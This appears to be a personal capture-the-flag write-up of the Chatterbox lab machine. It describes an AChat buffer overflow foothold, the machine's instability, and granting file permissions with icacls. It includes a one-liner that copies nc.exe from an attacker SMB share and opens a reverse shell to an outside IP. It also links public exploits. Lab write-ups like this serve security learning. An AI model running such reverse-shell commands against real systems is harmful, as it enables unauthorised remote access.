Shell as Alfred
Port 9255 is running AChat which seems to be a chatbot of some sort but I cannot access it through http
Searchsploit
This is going to be a buffer overflow exploit
This github has a python script and a bash script to create the payload. Its just an msfvenom script.
https://github.com/mpgn/AChat-Reverse-TCP-Exploit/blob/master/AChat_Exploit.py
This machine was insanely unstable, everytime you would use the exploit you would have 10 seconds before the shell died, then youd have to reset the machine to try it again. I figured it was the payload so i tried every payload I could think of but they all failed. I eventually realized it was just the machine being unstable after reading the reviews.
So I created a one liner to instantly use once I got a shell to download nc.exe and get a new shell before my shell died and it worked perfectly(I felt pretty smart after this). I also opened a second shell just in case my first one dies.
cd \windows\temp & net use \\10.10.14.24\share /u:df df & copy \\10.10.14.24\share\nc.exe & .\nc.exe -e cmd 10.10.14.24 9999
No other users so the next step is Admin
Privileged escalation to admin
Looks like we can possibly use https://www.exploit-db.com/exploits/50517 however it was discovered years after the machine came out.
I didnt find anything right away and i didnt want to deal with having to get the initial shell again so this exploit was released 2 years after the box came out. I will still try to find the actual path till I go to sleep.
Actually it looks like I still cant read root.txt
C:\Users\Administrator>icacls Desktop
icacls Desktop
Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
CHATTERBOX\Administrator:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CHATTERBOX\Alfred:(I)(OI)(CI)(F)
We can change permissions with this
icacls root.txt /grant alfred:F